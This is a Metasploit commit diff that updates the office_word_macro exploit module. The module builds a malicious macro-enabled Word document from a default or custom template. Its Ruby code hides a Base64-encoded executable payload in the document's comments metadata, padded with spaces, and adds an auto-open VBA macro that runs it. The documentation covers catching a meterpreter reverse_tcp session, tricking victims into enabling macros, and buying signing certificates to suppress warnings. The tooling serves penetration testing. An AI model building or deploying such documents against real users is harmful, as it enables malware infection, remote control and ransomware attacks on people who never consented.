Update office_word_macro exploit to support template injection

bug/bundler_fix
wchen-r7 2017-05-25 15:53:45 -05:00
parent e4ea618edf
commit ee13195760
19 changed files with 273 additions and 101 deletions

View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

View File

@ -0,0 +1,13 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description></dc:description>
<cp:lastModifiedBy>Nobody</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
<cp:category/>
</cp:coreProperties>

View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>105</TotalTime><Pages>1</Pages><Words>1</Words><Characters>10</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>10</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>15.0000</AppVersion></Properties>

View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Windows User</dc:creator><cp:keywords></cp:keywords><dc:description> PAYLOADGOESHERE</dc:description><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>32</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T20:39:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-02T22:26:00Z</dcterms:modified></cp:coreProperties>

Binary file not shown.

View File

@ -1,2 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData> <wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

Binary file not shown.

View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>

View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00A31ED0" w:rsidRDefault="00366A6C"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r><w:t>DOCBODYGOESHER</w:t></w:r></w:p><w:sectPr w:rsidR="00A31ED0"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>

View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="0075759D"/><w:rsid w:val="000446F5"/><w:rsid w:val="00364989"/><w:rsid w:val="00366A6C"/><w:rsid w:val="003925D3"/><w:rsid w:val="00472204"/><w:rsid w:val="004929CB"/><w:rsid w:val="004937C6"/><w:rsid w:val="004E70C7"/><w:rsid w:val="00556042"/><w:rsid w:val="005C1470"/><w:rsid w:val="00634AFC"/><w:rsid w:val="0075759D"/><w:rsid w:val="008352C1"/><w:rsid w:val="008D18EE"/><w:rsid w:val="008F274A"/><w:rsid w:val="009337EB"/><w:rsid w:val="00965754"/><w:rsid w:val="00A31ED0"/><w:rsid w:val="00AA0D43"/><w:rsid w:val="00BD14BB"/><w:rsid w:val="00C22BA6"/><w:rsid w:val="00D4037B"/><w:rsid w:val="00DD6E1E"/><w:rsid w:val="00E636EA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w15:chartTrackingRefBased/><w15:docId w15:val="{0E28A8EC-7E3E-41BD-9D1E-ADE8B995AEE4}"/></w:settings>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -1,2 +0,0 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>

View File

@ -1,13 +1,16 @@
## Description ## Description
This module generates a macro-enabled Microsoft Office Word document. It does not target a specific This module generates a macro-enabled Microsoft Office Word document (docm). It does not target a
CVE or vulnerability, this is more of a feature-abuse in Office, however this type of specific CVE or vulnerability, instead it's more of a feature-abuse in Office, and yet it's still a
social-engineering attack still remains common today. popular type of social-engineering attack such as in ransomware.
There are many ways to create this type of malicious doc. The module injects the Base64-encoded By default, the module uses a built-in Office document (docx) as the template. It injects the
payload in the comments field, which will get decoded back by the macro and executed as a Windows Base64-encoded payload into the comments field, which will get decoded back by the macro and executed
executable when the Office document is launched. as a Windows executable when the Office document is launched.
If you do not wish to use the built-in docx template, you can also choose your own. Please see more
details below.
## Vulnerable Application ## Vulnerable Application
@ -22,58 +25,74 @@ Specifically, this module was tested specifically against:
* Microsoft Office 2016. * Microsoft Office 2016.
* Microsoft Office Word 15.29.1 (161215). * Microsoft Office Word 15.29.1 (161215).
## Building the Office Document Template
It is recommended that you build your Office document (docx) template from either one of these
applications:
* Google Docs
* Microsoft Office Word
**Google Docs**
Google Docs is ideal in case you don't have Microsoft Office available.
Before you start, make sure you have a Gmail account.
Next, to create a new document, please go to the following:
[https://docs.google.com/document/?usp=mkt_docs](https://docs.google.com/document/?usp=mkt_docs)
To save the document as a docx on Google docs:
1. Click on File
2. Go to Download as
3. Click on Microsoft Word (.docx)
**Microsoft Office Word**
If you already have Microsoft Office, you can use it to create a docx file and use it as a template.
## Verification Steps ## Verification Steps
**To use the default template**
1. ```use exploit/multi/fileformat/office_word_macro``` 1. ```use exploit/multi/fileformat/office_word_macro```
2. ```set PAYLOAD [PAYLOAD NAME]``` 2. ```set PAYLOAD [PAYLOAD NAME]```
3. Configure the rest of the settings accordingly (BODY, LHOST, LPORT, etc) 3. Configure the rest of the settings accordingly (LHOST, LPORT, etc)
4. ```exploit``` 4. ```exploit```
5. The module should generate the malicious docm. 5. The module should generate the malicious docm.
**To use the custom template**
1. ```use exploit/multi/fileformat/office_word_macro```
2. ```set PAYLOAD [PAYLOAD NAME]```
3. ```set CUSTOMTEMPLATE [DOCX PATH]```
4. Configure the rest of the settings accordingly
5. ```exploit```
6. The module should generate the malicious docm.
## Options ## Options
**BODY** Text to put in the Office document. See **Modification** below if you wish to modify more. **CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
## Demo
In this example, first we generate the malicious docm exploit, and then we set up a
windows/meterpreter/reverse_tcp handler to receive a session. Next, we copy the docm
exploit to a Windows machine with Office 2013 installed, when the document runs the
macro, we get a session:
![macro_demo](https://cloud.githubusercontent.com/assets/1170914/22602348/751f9d66-ea08-11e6-92ce-4e52f88aaebf.gif)
## Modification
To use this exploit in a real environment, you will most likely need to modify the docm content.
Here's one approach you can do:
1. Use the module to generate the malicious docm
2. Copy the malicious docm to the vulnerable machine, and edit it with Microsoft Office (such as 2013).
When you open the document, the payload will probably do something on your machine. It's ok,
since you generated it, it should not cause any problems for you.
3. Save the doc, and test again to make sure the payload still works.
While editing, you should avoid modifying the following unless you are an advanced user:
* The comments field. If you have to modify this, make sure to create 55 empty spaces
in front of the payload string. The blank space is for making the payload less obvious
at first sight if the user views the file properties.
* The VB code in the macro.
## Trusted Document ## Trusted Document
By default, Microsoft Office does not execute macros automatically unless it is considered as a By default, Microsoft Office does not execute macros automatically unless it is considered as a
trusted document. This means that if a macro is present, the user will most likely need to manually trusted document. This means that if a macro is present, the user will most likely need to manually
click on the "Enable Content" button in order to run the macro. click on the "Enable Content" or "Enable Macro" button in order to run the macro.
Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick
the user into allowing the macro to run. For example, making the document look like something the user into allowing the macro to run. For example, making the document look like something
written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory). written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory).
To truly make the macro document to run without any warnings, you must somehow figure out a way to To truly make the macro document run without any warnings, you must somehow figure out a way to
sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts. sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts.
If money is not an issue, you can easily buy a certificate on-line:
[https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html](https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html)
For testing purposes, another way to have a certificate is to create a self-signed one using For testing purposes, another way to have a certificate is to create a self-signed one using
Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on
Windows: Windows:

View File

@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => "Microsoft Office Word Malicious Macro Execution", 'Name' => "Microsoft Office Word Malicious Macro Execution",
'Description' => %q{ 'Description' => %q{
This module generates a macro-enabled Microsoft Office Word document. The comments This module injects a malicious macro into a Microsoft Office Word document (docx). The
metadata in the data is injected with a Base64 encoded payload, which will be comments field in the metadata is injected with a Base64 encoded payload, which will be
decoded by the macro and execute as a Windows executable. decoded by the macro and execute as a Windows executable.
For a successful attack, the victim is required to manually enable macro execution. For a successful attack, the victim is required to manually enable macro execution.
@ -56,64 +56,226 @@ class MetasploitModule < Msf::Exploit::Remote
)) ))
register_options([ register_options([
OptString.new("BODY", [false, 'The message for the document body', OptPath.new("CUSTOMTEMPLATE", [false, 'A docx file that will be used as a template to build the exploit']),
'Contents of this document are protected. Please click Enable Content to continue.' OptString.new('FILENAME', [true, 'The Office document macro file (docm)', 'msf.docm'])
]),
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
]) ])
end end
def get_file_in_docx(fname)
i = @docx.find_index { |item| item[:fname] == fname }
def on_file_read(short_fname, full_fname) unless i
buf = File.read(full_fname) fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
case short_fname
when /document\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /core\.xml/
p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
b64_payload = ' ' * 55
b64_payload << Rex::Text.encode_base64(p)
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
end end
# The original filename of __rels is actually ".rels". @docx.fetch(i)[:data]
# But for some reason if that's our original filename, it won't be included
# in the archive. So this hacks around that.
case short_fname
when /__rels/
short_fname.gsub!(/\_\_rels/, '.rels')
end
yield short_fname, buf
end end
def add_content_type_extension(extension, content_type)
if has_content_type_extension?(extension)
update_content_type("Types//Default[@Extension=\"#{extension}\"]", 'ContentType', content_type)
else
xml = get_file_in_docx('[Content_Types].xml')
types_node = xml.at('Types')
def package_docm(path) unless types_node
zip = Rex::Zip::Archive.new fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
end
Dir["#{path}/**/**"].each do |file| child_data = "<Default Extension=\"#{extension}\" ContentType=\"#{content_type}\"/>"
p = file.sub(path+'/','') types_node.add_child(child_data)
end
end
if File.directory?(file) def has_content_type_extension?(extension)
print_status("Packaging directory: #{file}") xml = get_file_in_docx('[Content_Types].xml')
zip.add_file(p) xml.at("Types//Default[@Extension=\"#{extension}\"]") ? true : false
else end
on_file_read(p, file) do |fname, buf|
print_status("Packaging file: #{fname}") def add_content_type_partname(part_name, content_type)
zip.add_file(fname, buf) ctype_xml = get_file_in_docx('[Content_Types].xml')
types_node = ctype_xml.at('Types')
unless types_node
fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
end
child_data = "<Override PartName=\"#{part_name}\" ContentType=\"#{content_type}\"/>"
types_node.add_child(child_data)
end
def update_content_type(pattern, attribute, new_value)
ctype_xml = get_file_in_docx('[Content_Types].xml')
doc_xml_ctype_node = ctype_xml.at(pattern)
if doc_xml_ctype_node
doc_xml_ctype_node.attributes[attribute].value = new_value
end
end
def add_rels_relationship(type, target)
rels_xml = get_file_in_docx('_rels/.rels')
relationships_node = rels_xml.at('Relationships')
unless relationships_node
fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
end
last_index = get_last_relationship_index_from_rels
relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
end
def add_doc_relationship(type, target)
rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
relationships_node = rels_xml.at('Relationships')
unless relationships_node
fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node.')
end
last_index = get_last_relationship_index_from_doc_rels
relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
end
def get_last_relationship_index_from_rels
rels_xml = get_file_in_docx('_rels/.rels')
relationships_node = rels_xml.at('Relationships')
unless relationships_node
fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
end
relationships_node.search('Relationship').collect { |n|
n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
}.max
end
def get_last_relationship_index_from_doc_rels
rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
relationships_node = rels_xml.at('Relationships')
unless relationships_node
fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node')
end
relationships_node.search('Relationship').collect { |n|
n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
}.max
end
def inject_macro
add_content_type_extension('bin', 'application/vnd.ms-office.vbaProject')
add_content_type_partname('/word/vbaData.xml', 'application/vnd.ms-word.vbaData+xml')
pattern = 'Override[@PartName="/word/document.xml"]'
attribute_name = 'ContentType'
scheme = 'application/vnd.ms-word.document.macroEnabled.main+xml'
update_content_type(pattern, attribute_name, scheme)
scheme = 'http://schemas.microsoft.com/office/2006/relationships/vbaProject'
fname = 'vbaProject.bin'
add_doc_relationship(scheme, fname)
@docx << { fname: 'word/vbaData.xml', data: get_vbadata_xml }
@docx << { fname: 'word/_rels/vbaProject.bin.rels', data: get_vbaproject_bin_rels}
@docx << { fname: 'word/vbaProject.bin', data: get_vbaproject_bin}
end
def get_vbadata_xml
File.read(File.join(macro_resource_directory, 'vbaData.xml'))
end
def get_vbaproject_bin_rels
File.read(File.join(macro_resource_directory, 'vbaProject.bin.rels'))
end
def get_vbaproject_bin
File.read(File.join(macro_resource_directory, 'vbaProject.bin'))
end
def get_core_xml
File.read(File.join(macro_resource_directory, 'core.xml'))
end
def create_core_xml_file
add_content_type_partname('/docProps/core.xml', 'application/vnd.openxmlformats-package.core-properties+xml')
add_rels_relationship('http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties', 'docProps/core.xml')
@docx << { fname: 'docProps/core.xml', data: Nokogiri::XML(get_core_xml) }
end
def inject_payload
p = padding = ' ' * 55
p << Rex::Text.encode_base64(target.name =~ /Python/i ? payload.encoded : generate_payload_exe)
begin
core_xml = get_file_in_docx('docProps/core.xml')
rescue Msf::Exploit::Failed
end
unless core_xml
print_status('Missing docProps/core.xml to inject the payload to. Using the default one.')
create_core_xml_file
core_xml = get_file_in_docx('docProps/core.xml')
end
description_node = core_xml.at('//cp:coreProperties//dc:description')
description_node.content = p
end
def unpack_docx(template_path)
doc = []
Zip::File.open(template_path) do |entries|
entries.each do |entry|
if entry.name.match(/\.xml|\.rels$/i)
content = Nokogiri::XML(entry.get_input_stream.read)
else
content = entry.get_input_stream.read
end end
vprint_status("Parsing item from template: #{entry.name}")
doc << { fname: entry.name, data: content }
end end
end end
zip.pack doc
end end
def pack_docm
@docx.each do |entry|
if entry[:data].kind_of?(Nokogiri::XML::Document)
entry[:data] = entry[:data].to_s
end
end
Msf::Util::EXE.to_zip(@docx)
end
def macro_resource_directory
@macro_resource_directory ||= File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
end
def get_template_path
if datastore['CUSTOMTEMPLATE']
datastore['CUSTOMTEMPLATE']
else
File.join(macro_resource_directory, 'template.docx')
end
end
def exploit def exploit
print_status('Generating our docm file...') template_path = get_template_path
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro') print_status("Using template: #{template_path}")
docm = package_docm(path) @docx = unpack_docx(template_path)
print_status('Injecting payload in document comments')
inject_payload
print_status('Injecting macro and other required files in document')
inject_macro
print_status("Finalizing docm: #{datastore['FILENAME']}")
docm = pack_docm
file_create(docm) file_create(docm)
super super
end end